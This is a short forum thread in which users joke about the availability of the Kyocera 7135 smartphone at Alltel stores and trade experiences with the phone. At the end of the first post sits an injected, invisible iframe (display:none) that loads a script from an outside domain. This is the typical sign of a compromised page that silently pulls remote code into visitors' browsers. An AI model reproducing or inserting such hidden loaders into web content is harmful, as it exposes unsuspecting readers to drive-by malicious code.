+ Reply to Thread

Funny story about Alltel

I stopped by the local Alltel store this afternoon just to see if they had any 7135s available. (I stopped there mid-January when I first moved here and they didn't have any at the time.) Anyway, I walk in and go to the shelf where they have all the demo units. The salesdude came over and I told him I was interested in the 7135. He agreed it was a nice phone and had all sorts of cool stuff.

He then told me that even though it was a cool phone, they don't have digital service required to surf the internet, etc. activated in this area (Columbus, MS) yet, but should have it up and running in a few months. "We can sell you the phone but it would be kinda pointless." he says. :p

Didn't tell him I had Verizon and was patiently waiting for Monday.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Even Funnier!

I am on the ALLTEL network. I bought my 7135 3/8/03 after walking into my local ALLTEL store and playing with their demo several days in a row. When I decided this was what I wanted, they activated one for me and I walked out with it UNPAID 15 minutes later. I was charged $438 with a one year contract. They gave me 45 days "SAME-AS-CASH". Currently, they have several 7135's in house ready for immediate sale.

Yes, ALLTEL is digital. It is not 1x at the present time. My phone has had only one hard reset due to my stupidity of taking the phone out of the hot sync while the phone was still "cleaning up". No other problems since. I have to soft reset 1-2x weekly for one reason or another. I am on the original software.

I use the phone and the PDA extensively. Have relatively good battery life. I can check my e-mail and surf the web. Admittedly, it is slow. But while you are patiently waiting for Monday, I'm using my 7135 RIGHT NOW!!!!!!!!!!!!!!!!!!!!

Now that's funny.
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"